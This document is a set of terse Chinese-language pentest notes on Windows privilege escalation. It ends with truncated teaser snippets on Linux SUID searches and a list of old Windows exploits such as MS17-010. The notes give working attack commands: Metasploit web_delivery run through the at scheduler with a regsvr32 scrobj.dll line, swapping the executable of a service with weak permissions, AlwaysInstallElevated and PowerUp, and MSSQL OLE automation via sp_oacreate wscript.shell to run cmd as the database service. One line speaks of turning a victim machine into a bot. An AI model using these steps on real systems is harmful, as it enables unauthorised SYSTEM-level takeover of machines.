msf提權
因為uac,直接使用這個可能會失敗
漏洞提權
cs提權
一些命令是有system許可權的
用at開啟system許可權的msf
msf:
use exploit/multi/script/web_delivery
完成設定並執行
給出一條語句
將其在cmd下用at執行.例如:
at 11:21am /interactive regsvr32 /s /n /u /i: scrobj.dll
執行失敗,可以使用木馬執行
執行後,msf會收到乙個會話,system許可權
at 10:30am /interactive c:\3.exe
和前面一樣
windows 7/8/08/12/16弱資料夾許可權
第一步尋找執行任意使用者修改的服務,並且許可權是最高許可權使用者所執行的
得到所有使用者都可以訪問的結果後,生成乙個exe將其改名為服務啟動的exe替換
重啟系統
弱服務提權
登錄檔許可權不足(實用較少)
alwaysinstallelevated
powerup
mssql提權(1433)
開啟
exec sp_configue 'show advanced options',1;
reconfigure with override;
exec sp_configue 'ole automation procedures',1;
reconfigure with override;
exec sp_configue 'show advanced options',0;
利用並重定向到who.txt檔案
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\who.txt'
利用方法2
declare @o int:
exec sp_oamethod @o, 'shellexecute',null, 'cmd.exe','cmd /c net user >c:\test.txt','c:\windows\system32','','1';
windows基礎提權
提到system許可權 甚至讓他變成你的肉雞 我們了解一下windows下面有那些使用者 guests是使用者最低的許可權 而且一般是被禁用的 user許可權也很低 連關機都不行 還有window系統內建使用者組 只對本站的主目錄有讀寫修改的許可權 net user 顯示你當前系統有那些使用者賬號 ...
內網滲透 linux提權
查詢所有者為使用者的檔案 find type f user 使用者名稱 2 dev null 檢視帶有root許可權的suid命令 find type f perm u s 2 dev null find perm g s o perm u s type f 2 dev null type d 目錄...
內網提權 系統篇
windows 系統漏洞 ms系列 ms08 067 rpcms09 012 pr.exe 巴西烤肉提權 ms09 020 iis5 6 ms12 202 rdp藍屏 ms17 010 永恆之藍 wannacry cve 2019 0708 rdp 命令執行 粘滯鍵提權 sethc.exe 使用cm...